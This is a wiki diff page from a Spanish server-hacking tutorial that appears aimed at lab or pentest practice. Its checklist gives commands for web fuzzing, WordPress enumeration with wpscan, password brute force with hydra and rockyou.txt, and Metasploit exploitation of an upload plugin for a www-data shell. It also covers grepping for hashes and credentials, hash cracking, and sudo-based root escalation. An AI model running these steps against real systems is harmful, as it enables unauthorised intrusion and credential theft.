Herramientas de usuario

Herramientas del sitio


tutorial:hacking-servidores

Diferencias

Muestra las diferencias entre dos versiones de la página.

Enlace a la vista de comparación

Ambos lados, revisión anterior Revisión previa
Próxima revisión
Revisión previa
tutorial:hacking-servidores [2025/05/09 17:54]
truper
tutorial:hacking-servidores [2025/05/12 05:00] (actual)
truper
Línea 65: Línea 65:
  
  
-**9º Probar a hacer fuzzingejemplos:** \\ +**9º Identificar aplicaciones web instaladas//**CMS**//** 
-  * p1=directory-list-2.3-medium.txt +  ​* Hacer **fuzzing** para descubrir rutas, archivos de interés y **CMS** instalado 
-  * ffuf -u %%http://​ip/​FUZZ -w $p1%% -ac -fw 60000-90894 +    ​* p1=directory-list-2.3-medium.txt 
-  * ffuf -u %%http://​ip/​admin/​FUZZ -w $p1%% -ac -fw 60000-90894 +    * ffuf -u %%http://​ip/​FUZZ -w $p1%% -ac -fw 60000-90894 
-  * feroxbuster -u %%http://​pagina.com -w%% $p1 -o resultado.txt -x php,​html,​txt+    * ffuf -u %%http://​ip/​admin/​FUZZ -w $p1%% -ac -fw 60000-90894 
 +    * feroxbuster -u %%http://​pagina.com -w%% $p1 -o resultado.txt -x php,​html,​txt 
 +  * Encontrar **paneles de login** (rutas por defecto de instalación) 
 +  * Encontrar **versión** de **CMS** en el **código** fuente **html** de la página principal 
 +  * Buscar si hay **exploits para** esa versión de **CMS** 
 +  * Buscar si hay **nombre** de **usuario** en la página principal del **CMS** 
 +  * En **wordpress** 
 +    * Enumerar **plugins, usuarios**:​ 
 +      * %%wpscan --url http://​192.168.0.137/​wordpress --enumerate u,p%% 
 +    * **Ataque con acceso** 
 +      * 1º ataque de **fuerza bruta** 
 +        * A **xmlrpc.php de wordpress** (que permite múltiples intentos de login en una sola solicitud.) 
 +          * %%wpscan --url http://​192.168.0.137/​wordpress -U maria -P rockyou.txt%% 
 +        * Al **panel de login** como en cualquier otro **CMS** (menos eficiente y más dificil de escribir) 
 +          * Con **hydra** 
 +            * data="​cadena del inspector de código de firefox del archivo login.php"​ 
 +            * hydra -l pepe -P rockyou.txt url http-post-form data 
 +          * Con un script hecho a medida como el de [[https://​github.com/​0xDTC/​Bludit-3.9.2-Auth-Bruteforce-Bypass-CVE-2019-17240/​blob/​master/​CVE-2019-17240|Bludit]] 
 +       * 2º Una vez descubierta la contraseña se explota una **vulnerabilidad** en un **plugin de subida de archivos** 
 +         * Desde metasploit (fácil) 
 +           * Comandos 
 +             * search wordpress 
 +             * use 0 
 +             * show options 
 +             * set, run 
 +             * una vez dentro se obtiene **shell** como usuario **www-data** y: 
 +               * Se buscan **hashes y credenciales** por los archivos de la ruta del **CMS** __%%/​var/​www/​html/​loquesea%%__ 
 +                 * %%grep -irE '​[a-z]+:​\$'​ /​var/​www/​cms/​*%%  
 +                 * %%grep -irE '​[a-z]+@gmail'​ /​var/​www/​cms/​*%% 
 +               * Obtenido el **hash** se intenta **descifrar** en **[[https://​crackstation.net|crackstation]]** 
 +               * Se intenta hacer **escalada a root** 
 +                 * **sudo -l** (con el que estamos), **sudo -l -U www-data** 
 +                   * (ALL : ALL) ALL 
 +                   * (ALL) NOPASSWD: ALL ->  El usuario puede ejecutar cualquier comando como root sin necesidad de contraseña. Escalada inmediata. 
 +         * creando el archivo malicioso (payload) con metasploit que contiene una reverse shell (más difícil)
  
-**10º Identificar qué aplicaciones web hay instaladas, algún CMS como por ejemplo wordpress, si lo hay buscar el panel de login (ruta por defecto de instalación)** +  ​
-  * Encontrar la versión del CMS en el código fuente html de la página principal +
-  * Buscar si hay exploits para esa versión de CMS +
-  * Buscar si hay nombre de usuario en la página principal del CMS +
-  * En wordpress, enumerar plugins y usuarios +
-    * %%wpscan --url http://​192.168.0.137/​wordpress --enumerate u,p%% +
- +
-**11º Ataque de fuerza bruta al panel de login** +
-  * con hydra +
-  * con wpscan si es wordpress o tambien con hydra +
-  * con un script hecho a medida para [[https://​github.com/​0xDTC/​Bludit-3.9.2-Auth-Bruteforce-Bypass-CVE-2019-17240/​blob/​master/​CVE-2019-17240|Bludit]],​ o con hydra+
  
 .....continuará. Feliz hacking 8-) .....continuará. Feliz hacking 8-)
tutorial/hacking-servidores.1746806071.txt.gz · Última modificación: 2025/05/09 17:54 por truper